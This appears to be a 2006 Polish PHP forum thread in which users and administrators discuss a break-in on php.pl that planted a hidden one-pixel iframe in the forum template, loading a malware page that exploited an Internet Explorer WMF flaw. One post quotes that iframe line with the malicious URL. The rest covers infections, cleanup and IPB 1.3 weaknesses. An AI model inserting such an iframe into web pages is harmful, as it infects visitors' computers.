Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Włam na forum!?, Wczoraj... 22.00 :| ??????
Master Miko
post
Post #1





Grupa: Zarejestrowani
Postów: 530
Pomógł: 0
Dołączył: 15.01.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Co się wczoraj stało! Wchodzę na forum... (przez IE) patrzę, nagle pojawia się monit skryptu... i jakiś dziwny kod. Zacina się... firewall wybucha świszczy i promieniuje głęboką czerwienią...
wypluwając:

Kod
IP: 85.249.19.122
PORT: TCP
[362] MS WMF Code Exec Attempt Detected (CVE-2005-4560)


Wlazłem FIrefoxem... nic się nie pojawiło poza... Nie można połączyć się z domeną "http://2-extreme.biz/traff.php?adv=53" (BROŃ BOŻE NIE WCHODZIĆ TAM)

Zaintrygował mnie mały kwadracik na górze forum... był to iframe o treści:

  1. <iframe src="http://2-extreme.biz/traff.php?adv=53" width=1 height=1></iframe>


Umieszczony dokładnie nad doctype.

Jak on się tam dostał?! Jak to się stało?! Jakim sposbem :|

Mam farta.. (i firewalla), bo naszczęście miałem dobre zabezpieczenia.. ale tak to mój komp byłby teraz... zainfekowany... to było dosyć niebezpieczne :/

ohmy.gif


--------------------
Go to the top of the page
+Quote Post
4 Stron V   1 2 3 > »   
Start new topic
Odpowiedzi (1 - 60)
seaquest
post
Post #2





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Wiemy, już zlikwidowaliśmy i zabezpieczyliśmy.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post
Master Miko
post
Post #3





Grupa: Zarejestrowani
Postów: 530
Pomógł: 0
Dołączył: 15.01.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Cieszę się bardzo, że ekipa forum php jest bardzo szybka. Praktycznie 15 minut po zgłoszeniu wszystko było ok! Brawo.

Ale jednak pojawił się problem... który był dość niebezpieczny. Stałem się taki mniej pewny przez to wydarzenie... imo dziwne to było :|


--------------------
Go to the top of the page
+Quote Post
nospor
post
Post #4





Grupa: Moderatorzy
Postów: 36 557
Pomógł: 6315
Dołączył: 27.12.2004




Doskonale Cię rozumiem Master Miko. Postaramy się niedługo udzielic więcej informacji na ten temat, jak już tylko zbadamy dokladnie logi i bedziemy mieli pewność co i jak. Póki co nie chcemy na wyrost nic mówić, by potem nie bylo, ze cos źle mowimy lub wprowadzamy specjalnie w błąd.

ps: dziękuje z tego miejsca Tobie i innym osobom, za szybką reakcję, po zobaczeniu nieprawidłowości


--------------------

"Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista
"Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer

Go to the top of the page
+Quote Post
kosheen2k
post
Post #5





Grupa: Zarejestrowani
Postów: 84
Pomógł: 0
Dołączył: 9.03.2006
Skąd: z fotela ;p

Ostrzeżenie: (0%)
-----


dokładnie miałem to samo, ale niestety mój Kerio Personal Firewall nie dał sobie rady... zdążylem też zauwazyć ten intrygujący kwadracik i nagle zwiecha komputera i restart...


--------------------


Go to the top of the page
+Quote Post
Zajec
post
Post #6





Grupa: Zarejestrowani
Postów: 1 086
Pomógł: 8
Dołączył: 10.12.2003

Ostrzeżenie: (0%)
-----


Dzwię się, że po takich akcjach ludzie jeszcze wracają do IE :-) Używajcie sobie na stałe Opery/Firefoksa, które są po prostu niepodatne na jakieś tam "wirusy" stronowe cool.gif
Go to the top of the page
+Quote Post
Master Miko
post
Post #7





Grupa: Zarejestrowani
Postów: 530
Pomógł: 0
Dołączył: 15.01.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Ten wirus został zaprojektowany specjalnie na internet explorer. Wchodziłem na strone zhackowaną przez Firefoxa pojawiało się strona niedostępna. Równie dobrze można było zrobić hacka na firefoxa lub operę....

a dlaczego tylko na IE? pewnie znacie odpowiedź...


--------------------
Go to the top of the page
+Quote Post
sf
post
Post #8





Grupa: Zarejestrowani
Postów: 1 597
Pomógł: 30
Dołączył: 19.02.2003
Skąd: Tychy

Ostrzeżenie: (0%)
-----


Cytat(Master Miko @ 2006-05-07 12:16:24)
a dlaczego tylko na IE? pewnie znacie odpowiedź...

Bo kto nie jest z nami jest przeciwko nam. ph34r.gif Wszyscy, którzy używaja IE pożałują! axesmiley.png


--------------------
Zapraszam na mój php blog, tworzenie stron.
Go to the top of the page
+Quote Post
GrayHat
post
Post #9





Grupa: Zarejestrowani
Postów: 566
Pomógł: 18
Dołączył: 23.08.2003
Skąd: Łomża

Ostrzeżenie: (0%)
-----


heh php.pl chcialo zarobic co?? takie serwisy placa do 10€ za 1000 zainfekowanych kompow winksmiley.jpg na webhelp jest dyskusja na ten temat winksmiley.jpg


--------------------
*Note: No animals were killed durning the construction of this post.
Go to the top of the page
+Quote Post
DeyV
post
Post #10





Grupa: Zarząd
Postów: 2 277
Pomógł: 6
Dołączył: 27.12.2002
Skąd: Wołów/Wrocław




Ooby które ucierpiały z powodu naszych problemów serdecznie przepraszamy.

Jest to jednak tylko jeszcze jeden przykład tego, że każdy komputer powinien być zaopatrzony w program antywirusowy - choćby w darmowego Avasta...


--------------------
"Niezależnie od tego, jakie masz osiągnięcia, ktoś Ci pomaga..."
Go to the top of the page
+Quote Post
NuLL
post
Post #11





Grupa: Zarejestrowani
Postów: 2 262
Pomógł: 21
Dołączył: 3.05.2004
Skąd: Sopot, Krakow, W-wa

Ostrzeżenie: (0%)
-----


Ja nie mam nic sad.gif Ba - mam nawet zablokowany dostep do BIOSu w kompie.

Ktos sie orientuje czym to gowno mozna usunac questionmark.gif Bo chcialbym chociaz czesc danych w miare mozliwosci.


--------------------
Javascript, Coffeescript, Node.js, Mongo, CouchDb, chmury, workery & inne bajery - zycie jest zbyt krotkie aby miec nudna prace :)
Go to the top of the page
+Quote Post
Slump
post
Post #12





Grupa: Zarejestrowani
Postów: 53
Pomógł: 0
Dołączył: 3.01.2004
Skąd: Iława

Ostrzeżenie: (0%)
-----


NuLL moze i glupia propozycja a resetowales biosa??

Tak tylko pytam smile.gif
Go to the top of the page
+Quote Post
NuLL
post
Post #13





Grupa: Zarejestrowani
Postów: 2 262
Pomógł: 21
Dołączył: 3.05.2004
Skąd: Sopot, Krakow, W-wa

Ostrzeżenie: (0%)
-----


Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
sad.gif


--------------------
Javascript, Coffeescript, Node.js, Mongo, CouchDb, chmury, workery & inne bajery - zycie jest zbyt krotkie aby miec nudna prace :)
Go to the top of the page
+Quote Post
strife
post
Post #14





Grupa: Przyjaciele php.pl
Postów: 2 605
Pomógł: 96
Dołączył: 22.10.2004
Skąd: UK

Ostrzeżenie: (0%)
-----


Cytat(NuLL @ 2006-05-07 16:20:10)
Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
sad.gif

Współczuje Ci, ja jakiś miesiąc dwa też miałem awarię, jednak spowodowaną eksperymentami z linuxem, straciłem 40 GB muzyki, filmów, i co najważnejsze sporo cennych danych. sad.gif

Szukałem trochę o trojanie jednak żadnych konkretnych informacji nie znalazłem, dziwi mnie to, że trojan ustawił Ci hasło na BIOS - jeszcze o takim przypadku nie słyszałem.

Teraz mogą Ci jedynie pomóc programy, które odzyskują sformatowane partycje, żadnego polecić nie mogę bo żaden mi nie działał tak jakbym chciał sad.gif

Jak coś znajdę dam znać :]

Pozdrawiam smile.gif


--------------------
Go to the top of the page
+Quote Post
NuLL
post
Post #15





Grupa: Zarejestrowani
Postów: 2 262
Pomógł: 21
Dołączył: 3.05.2004
Skąd: Sopot, Krakow, W-wa

Ostrzeżenie: (0%)
-----


Thx za troske smile.gif

Osobiscie myslalem ze format bedzie - bo zamienilem dyski laptopowe i instaluje sobie obecnie nowego smile.gif

Myslalem aby sie poratowac linuxem

Ale...

Zadzwonilem do pewnej osoby czyli administratora microsoftu biggrin.gif i co mi powiedzial :

-> zainstal sobie uczelnianego 2k3 Server na NTFSie
-> podepnij dysk z laptopa na USB do kompa stacjonarnego
-> zabron programom z laptopowego dysku dostepu do pamieci i dysku z 2k3 Server
-> wywal ten folder, nastepny - tak chyba z 400 MB folderow systemowych windowsa oraz tych z 'Documents and Settings'
-> podepnij dysk

i sprawdz...

DZIALA biggrin.gif

Co do trojanow BIOSowych - to mozliwe - podobnie jak z poziomu Windowsa jest mozliwa aktualizacja BIOSu


--------------------
Javascript, Coffeescript, Node.js, Mongo, CouchDb, chmury, workery & inne bajery - zycie jest zbyt krotkie aby miec nudna prace :)
Go to the top of the page
+Quote Post
Fo
post
Post #16





Grupa: Zarejestrowani
Postów: 401
Pomógł: 0
Dołączył: 18.04.2003
Skąd: Trójmiasto

Ostrzeżenie: (0%)
-----


Cytat("mail przeprosinowy")
W związku z ostatnim włamaniem na php.pl i rozesłaniem e-maili z adresem do zainfekowanego pliku ekipa php.pl chce przeprosić za wszystkie problemy powstałe w ten sposób.

W wyniku ataku dodano też do kodu forum ramkę, która u użytkowników przeglądarki Internet Explorer spowodowała wejście na zainfekowaną stronę. Poza tym zamieniono też adresy w jednym z tematów na prowadzące do zainfekowanego pliku wykonalnego.

Musimy przyznać, że do włamania doszło ze względu na słabe hasło jednego z naszych administratorów. Dlatego też zachęcamy do zmiany hasła na mocne (co najmniej 8 znaków, duże i małe litery, cyfry, znaki specjalne). Hasła typu: dom, qwerty, login itp nie są bezpieczne.

Chcę podkreślić, że wszystkie hasła zostały wzmocnione, a na całą sieć, z której pochodził atak nałożony został ban. Zostały też wzmocnione zabezpieczenia serwera, a do skryptu forum dopisano modyfikację, która wymaga podania dodatkowego hasła w celu wysłania wiadomości do wszystkich użytkowników.

Jeszcze raz serdecznie przepraszamy.
...


wlasnie dostalem takiego maila z przeprosinami,
hmm jak najbardziej na miejscu - szczegolnie dla tych ktorzy sie nacieli,
ale czy naprawde panowie nie uwazacie ze do kwestii bezpieczenstwa powinno sie podejsc nieco inaczej niz ban na cala klase adresow z ktorych bylo/moglo byc polaczenie ?

[info] nie chce byc odebrany jako jakis natret, albo cus, ale mam wrazenie ze taka reakcja to raczej jeden sik z hydrantu w plonacy budynek... hmm, on dalej po chwili bedzie plonac [/info]
Go to the top of the page
+Quote Post
Radarek
post
Post #17





Grupa: Zarejestrowani
Postów: 188
Pomógł: 0
Dołączył: 23.05.2005

Ostrzeżenie: (0%)
-----


A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...
Go to the top of the page
+Quote Post
aleksander
post
Post #18





Grupa: Przyjaciele php.pl
Postów: 742
Pomógł: 0
Dołączył: 14.12.2003
Skąd: Gdańsk, Trójmiasto

Ostrzeżenie: (0%)
-----


przyznac sie ktory to:D bedzie publiczne biczowanie:D
Go to the top of the page
+Quote Post
strife
post
Post #19





Grupa: Przyjaciele php.pl
Postów: 2 605
Pomógł: 96
Dołączył: 22.10.2004
Skąd: UK

Ostrzeżenie: (0%)
-----


Cytat(Radarek @ 2006-05-07 18:23:15)
A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...

A ja to zrozumiałem, że "słabe" w sensie, że nie wystarczyło bo jednak był włam. Każde zabezpieczenie wydające się nam najlepsze może się okazać za "słabe" jak ktoś je złamie. Tak to odebrałem:)

Przecież administrator to też człowiek ( chyba tongue.gif ).


--------------------
Go to the top of the page
+Quote Post
GrayHat
post
Post #20





Grupa: Zarejestrowani
Postów: 566
Pomógł: 18
Dołączył: 23.08.2003
Skąd: Łomża

Ostrzeżenie: (0%)
-----


bierzcie przyklad ze mnie winksmiley.jpg 18 znakow: 6 cyfr, 6 liter malych i 6 liter wielkich winksmiley.jpg


--------------------
*Note: No animals were killed durning the construction of this post.
Go to the top of the page
+Quote Post
Zajec
post
Post #21





Grupa: Zarejestrowani
Postów: 1 086
Pomógł: 8
Dołączył: 10.12.2003

Ostrzeżenie: (0%)
-----


Cytat(Master Miko @ 2006-05-07 12:16:24)
Równie dobrze można było zrobić hacka na firefoxa lub operę....

Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.

Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.


[dodano]
http://security.blaut.biz/

Ten post edytował Zajec 7.05.2006, 18:51:26
Go to the top of the page
+Quote Post
seaquest
post
Post #22





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Fo: ban na całą klasę adresów, to jeszcze dodatkowe zabezpieczenie, ponieważ ataki nie pochodziły z Polski.

Poza tym zwiększyliśmy zabezpiecznia użytkowników uprzywilejowwanych i do kluczowych dla systemu funkcji dodaliśmy dodatkowe, niestandartowe zabezpieczenia.

Myślę, że zrobiliśmy wszystko, żeby taka sytuacja się nie powtórzyła.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post
Seth
post
Post #23





Grupa: Przyjaciele php.pl
Postów: 2 335
Pomógł: 6
Dołączył: 7.03.2002

Ostrzeżenie: (0%)
-----


GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP
Go to the top of the page
+Quote Post
hwao
post
Post #24


Developer


Grupa: Moderatorzy
Postów: 2 844
Pomógł: 20
Dołączył: 25.11.2003
Skąd: Olkusz




Cytat(Seth @ 2006-05-07 19:58:41)
GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP

Kto jak kto, ale jak na GrayHat to wielce prawdopodobne...
Ewentualnie obstawiam ze to hash md5 i pierwsze 6 znakow z duzej litery.

Co do biosow, to sa uniwersalne hasla.
Moral z tego taki, nie uzywac dziurawych systemow operacyjnych biggrin.gif
Np mi sie nic nie stalo tongue.gif
Go to the top of the page
+Quote Post
mario
post
Post #25





Grupa: Zarejestrowani
Postów: 186
Pomógł: 0
Dołączył: 23.09.2003
Skąd: Siemianowice Śląskie

Ostrzeżenie: (0%)
-----


przeczytalem przed chwileczka mail'a nt. wlamu. Wszyscy mieli dostac jakas "masowke" zapraszajaca na zhakowane forum. Cale szczescie do mnie taki mail nie doszedl, a po drugie uzywam Opery :-)

IE jest do d.... Opera i Firefox RULEZZZZZ!!!!!!!!!


--------------------
W życiu piękne są tyko chwile....
Życie choć piękne tak krótkie jest....
Wystarczy chwila by zgasić je....
Go to the top of the page
+Quote Post
spenalzo
post
Post #26





Grupa: Zarejestrowani
Postów: 2 064
Pomógł: 1
Dołączył: 22.01.2003
Skąd: Poznań

Ostrzeżenie: (0%)
-----


Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.

Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB smile.gif


--------------------

Go to the top of the page
+Quote Post
angel2953
post
Post #27





Grupa: Zarejestrowani
Postów: 199
Pomógł: 5
Dołączył: 8.07.2004
Skąd: gdynia

Ostrzeżenie: (0%)
-----


Cytat(spenalzo @ 2006-05-07 20:47:17)
Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.

Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB smile.gif

skoro to już jest drugi tego typu atak (może jest ich więcej) to można by to zgłosić do autorów IPB, bo może to dziura w samym skryptcie... questionmark.gifquestionmark.gif


--------------------
Sygnaturkę ukradli
Go to the top of the page
+Quote Post
DeyV
post
Post #28





Grupa: Zarząd
Postów: 2 277
Pomógł: 6
Dołączył: 27.12.2002
Skąd: Wołów/Wrocław




Spenalzo - czy wiecie, w jaki sposob ktoś zdobył hasla administracyjne?
Czy też spodziewasz się jakiejść dziury lub backdora ?


czy też mówisz o czymś jeszcze innym (bo nie do końca rozumiem) ?


--------------------
"Niezależnie od tego, jakie masz osiągnięcia, ktoś Ci pomaga..."
Go to the top of the page
+Quote Post
spenalzo
post
Post #29





Grupa: Zarejestrowani
Postów: 2 064
Pomógł: 1
Dołączył: 22.01.2003
Skąd: Poznań

Ostrzeżenie: (0%)
-----


Mówie o dokładnie tym samym tongue.gif
Co ciekawe - zauważyłem to dzisiaj rano (+ info od userów o wirusach, ja nie miałem), usunąłem. Po paru godzinach ten iframe pojawił sie znowu ohmy.gif co mnie dosyć poważnie zaniepokoiło co do bezpieczeństwa forum...
W pierwszej chwili pomyśłałem, że ktoś złamał moje hasła np. do forum - jednak jak zobaczyłem ten temat tutaj to zaniepokoiłem sie troche bardziej, bo skoro przydarzyło sie to na dwóch forach mniej wiejcej w tym samym czasie to jest to coś bardziej poważnego niż złamane hasło :/


--------------------

Go to the top of the page
+Quote Post
Master Miko
post
Post #30





Grupa: Zarejestrowani
Postów: 530
Pomógł: 0
Dołączył: 15.01.2005
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Cytat(Zajec @ 2006-05-07 17:51:03)
Cytat(Master Miko @ 2006-05-07 12:16:24)
Równie dobrze można było zrobić hacka na firefoxa lub operę....

Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.

Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.


[dodano]
http://security.blaut.biz/

ahahahahahah koleś tym postem mnie ZABIŁEŚexclamation.gif!!


////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy snitch.gif

Ten post edytował Master Miko 7.05.2006, 21:48:09


--------------------
Go to the top of the page
+Quote Post
DeyV
post
Post #31





Grupa: Zarząd
Postów: 2 277
Pomógł: 6
Dołączył: 27.12.2002
Skąd: Wołów/Wrocław




spenalzo - jesli używasz ipb 1.3 to problem może być w czymś zupełnie innym. Używany przez nas skrypt nie ma ograniczenia na ilośc prób logowania.

Oznacza to, że ... jest bardzo podatny na brutal force.

Planujemy w najbliższym czasie przygotowac modyfikację pod tym kątem. A narazie pozostaje nam tylko mieć nadzieję, że to nie jest coś poważniejszego...


--------------------
"Niezależnie od tego, jakie masz osiągnięcia, ktoś Ci pomaga..."
Go to the top of the page
+Quote Post
Zajec
post
Post #32





Grupa: Zarejestrowani
Postów: 1 086
Pomógł: 8
Dołączył: 10.12.2003

Ostrzeżenie: (0%)
-----


Cytat(Master Miko @ 2006-05-07 21:39:15)
ahahahahahah koleś tym postem mnie ZABIŁEŚexclamation.gif!!


////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy snitch.gif

Nie ma to jak konkretna, uargumentowana odpowiedź :-) Brawo, zbiłeś wszystkie moje argumenty.
Go to the top of the page
+Quote Post
spenalzo
post
Post #33





Grupa: Zarejestrowani
Postów: 2 064
Pomógł: 1
Dołączył: 22.01.2003
Skąd: Poznań

Ostrzeżenie: (0%)
-----


No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...

A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...

Ten post edytował spenalzo 7.05.2006, 23:21:00


--------------------

Go to the top of the page
+Quote Post
hwao
post
Post #34


Developer


Grupa: Moderatorzy
Postów: 2 844
Pomógł: 20
Dołączył: 25.11.2003
Skąd: Olkusz




Pewne ktos znalaz dziure na ipb i "sprzeda" oferte dodania "tego czegos" na kazdym ipb w wersji 1.3. Zapewne robi to poprostu automat puszczony w interncie (podobnie bylo z phpbb).

Trzeba zamienic wersje form na najnowsza jaka mamy i tyle... ba swoja droga suport 1.3 juz nie pomoze a jezeli ktos nie powie jak "to zrobil" (a watpie zeby to zrobil) to problem szybko nie zniknie.
Go to the top of the page
+Quote Post
angel2953
post
Post #35





Grupa: Zarejestrowani
Postów: 199
Pomógł: 5
Dołączył: 8.07.2004
Skąd: gdynia

Ostrzeżenie: (0%)
-----


Cytat(spenalzo @ 2006-05-07 23:12:45)
No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...

A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...

Masz racę: to nie jest złamane hasło i nikogo z ekipy php.plnie należy winić. To jest dziura w IPB 1.3... Własnie znalazłem 23 (a to tylko pierwsza strona na googlach a jest ich klikadziesiąt) fora oparte o IPB 1.3, które mają lub miały ten sam problem...


--------------------
Sygnaturkę ukradli
Go to the top of the page
+Quote Post
MrMag
post
Post #36





Grupa: Zarejestrowani
Postów: 154
Pomógł: 5
Dołączył: 24.02.2004

Ostrzeżenie: (0%)
-----


wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.


--------------------
Go to the top of the page
+Quote Post
sztosz
post
Post #37





Grupa: Zarejestrowani
Postów: 866
Pomógł: 32
Dołączył: 2.06.2004
Skąd: Wrocław

Ostrzeżenie: (0%)
-----


Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.

Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?


--------------------
Go to the top of the page
+Quote Post
angel2953
post
Post #38





Grupa: Zarejestrowani
Postów: 199
Pomógł: 5
Dołączył: 8.07.2004
Skąd: gdynia

Ostrzeżenie: (0%)
-----


Cytat(MrMag @ 2006-05-08 10:56:45)
wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.

Szczególnie bym obadał odwołania do login.php bo z tego co czytałem to tam chyba jest ta dziura z uzyskaniem praw admina...

@normanos: z tego co się orientuję to ten bład jest do wersji 2.0.4 a podobny w wersji 2.1.5...

Ten post edytował angel2953 8.05.2006, 14:16:06


--------------------
Sygnaturkę ukradli
Go to the top of the page
+Quote Post
nrm
post
Post #39





Grupa: Zarejestrowani
Postów: 627
Pomógł: 33
Dołączył: 1.05.2005
Skąd: Katowice

Ostrzeżenie: (0%)
-----


IPB 1.3 to prehistoria. sporo dziur. od tej wersji minelo pare lat az do 2.1.x smile.gif

swoja droga czemu nie kupicie licencji?


--------------------
Go to the top of the page
+Quote Post
Slump
post
Post #40





Grupa: Zarejestrowani
Postów: 53
Pomógł: 0
Dołączył: 3.01.2004
Skąd: Iława

Ostrzeżenie: (0%)
-----


Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware smile.gif
Go to the top of the page
+Quote Post
angel2953
post
Post #41





Grupa: Zarejestrowani
Postów: 199
Pomógł: 5
Dołączył: 8.07.2004
Skąd: gdynia

Ostrzeżenie: (0%)
-----


Cytat(Slump @ 2006-05-08 14:27:58)
Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware smile.gif

Znaczy się bezie nowa wersja IPB czy zupełnie nowy skrypt forum (napisany przez ekipę php.pl tongue.gif ) questionmark.gif?


--------------------
Sygnaturkę ukradli
Go to the top of the page
+Quote Post
DeyV
post
Post #42





Grupa: Zarząd
Postów: 2 277
Pomógł: 6
Dołączył: 27.12.2002
Skąd: Wołów/Wrocław




IPB 2.1

Co do własnego - wystarczy że wielu z nas angażuje się / angażowal w OPB winksmiley.jpg


--------------------
"Niezależnie od tego, jakie masz osiągnięcia, ktoś Ci pomaga..."
Go to the top of the page
+Quote Post
kwiateusz
post
Post #43


Admin Techniczny


Grupa: Administratorzy
Postów: 2 071
Pomógł: 93
Dołączył: 5.07.2005
Skąd: Olsztyn




no wreszcie bo 1.3 troche archaiczny system D: SLump znajdujesz czas na upgrade przy pracy nad OPB tongue.gif
Go to the top of the page
+Quote Post
seaquest
post
Post #44





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Ale to nie on, tylko ja, NuLL i jeszcze pare innych osób, które robiło mody. Oczywiście Slump też między innymi.


--------------------
Michał Płachta
Warsztat: Mac OS X Leopard, PostgreSQL, Text Mate, Retrospectiva + SVN
Go to the top of the page
+Quote Post
spenalzo
post
Post #45





Grupa: Zarejestrowani
Postów: 2 064
Pomógł: 1
Dołączył: 22.01.2003
Skąd: Poznań

Ostrzeżenie: (0%)
-----


Dzisiaj poprzeglądałem troche statsy z webalizera - i co sie okazało?
W maju było ~200 odwołan do admin.php ohmy.gif - z czego moich jakieś 5 sad.gif

No i chyba mamy przyczyne.

Ten post edytował spenalzo 8.05.2006, 21:08:40


--------------------

Go to the top of the page
+Quote Post
kwiateusz
post
Post #46


Admin Techniczny


Grupa: Administratorzy
Postów: 2 071
Pomógł: 93
Dołączył: 5.07.2005
Skąd: Olsztyn




nie wiem czy do 1.3 jest taki modzik ale do 2.1 jest ze mozna admin.php przeniesc do dowolnego pliku... tak kwestia zabezpieczen biggrin.gif
Go to the top of the page
+Quote Post
acztery
post
Post #47





Grupa: Zarejestrowani
Postów: 945
Pomógł: 7
Dołączył: 15.03.2005
Skąd: katowice

Ostrzeżenie: (0%)
-----


forum na którym tyle o bezpieczenstwie a tu włam, to Ci ironia.
Go to the top of the page
+Quote Post
GrayHat
post
Post #48





Grupa: Zarejestrowani
Postów: 566
Pomógł: 18
Dołączył: 23.08.2003
Skąd: Łomża

Ostrzeżenie: (0%)
-----


Cytat(sztosz @ 2006-05-08 12:31:07)
Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.

Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?

nie zgodze sie z toba. obowiazkiem ekipy php.pl jest zabezpieczanie serwerow. to nie pierwszy wlam do php.pl kiedys podmieniono nawet strone... to tak jak by ktos uzyskal dostep do wszystkich kont pocztowych na onecie dzieki dziurze w webmailu... i co to wina programisty ktory go pisal czy zarzadu?? snitch.gif


--------------------
*Note: No animals were killed durning the construction of this post.
Go to the top of the page
+Quote Post
hwao
post
Post #49


Developer


Grupa: Moderatorzy
Postów: 2 844
Pomógł: 20
Dołączył: 25.11.2003
Skąd: Olkusz




GrayHat czemu nie czytasz wszytkich tematow i sie wypowiadasz?
Go to the top of the page
+Quote Post
sztosz
post
Post #50





Grupa: Zarejestrowani
Postów: 866
Pomógł: 32
Dołączył: 2.06.2004
Skąd: Wrocław

Ostrzeżenie: (0%)
-----


@GrayHat: Ale co to że kompy zostały zainfekowane to wina użytkowników w tym przypadku. Co innego jak ktoś przegląda moją pocztę na serwerze (to jest niedopuszczalne), a co innego jak ktoś ma np. zdalny dostęp do mojego komputer w domu, bo go nie zabezpieczyłem choćby darmowym antywirusem i firewallem.


--------------------
Go to the top of the page
+Quote Post
hOMER
post
Post #51





Grupa: Zarejestrowani
Postów: 4
Pomógł: 0
Dołączył: 30.09.2005

Ostrzeżenie: (0%)
-----


witam
bardzo prosze o pomoc. jak sobie poradziliscie z tym wirusem
widze ze opanował on wiekszosc for na IPB

nasze forum tez padło
www.corrado.com.pl

na poczatku władowal sie przez IE i rozwalil kilka kompow. przeszlismy na foxa i bylo ok.
potem ewoluowal i doszedl skrypt takrze pod Foxa wiec kazalismy userom zainstalowac skrypt NoScript. Jednak dzien kolejny przyniusł kolejną ewolucje i tego juz nie przeszlismy. Zaczął ładować jakiegos .exe mimo ze skrypty byly blokowane.
Pozniej nasz admin stracil prawa admina i nie mamy juz admina na forum.

bardzo prosze o wszelkie wskazowki jak usunąć tą dziure
Go to the top of the page
+Quote Post
seaquest
post
Post #52





Grupa: Przyjaciele php.pl
Postów: 790
Pomógł: 7
Dołączył: 6.02.2003
Skąd: Polska

Ostrzeżenie: (0%)
-----


Trzeba mieć dostęp do panelu administratora forum, żeby usunąć. Trzeba wejść w zarządzanie Skórami i szablonami, dalej: Forumowe Wrappery i edytuj. Na samej górze powinien być ten złośliwy kod. Trzeba go usunąć zapisać.

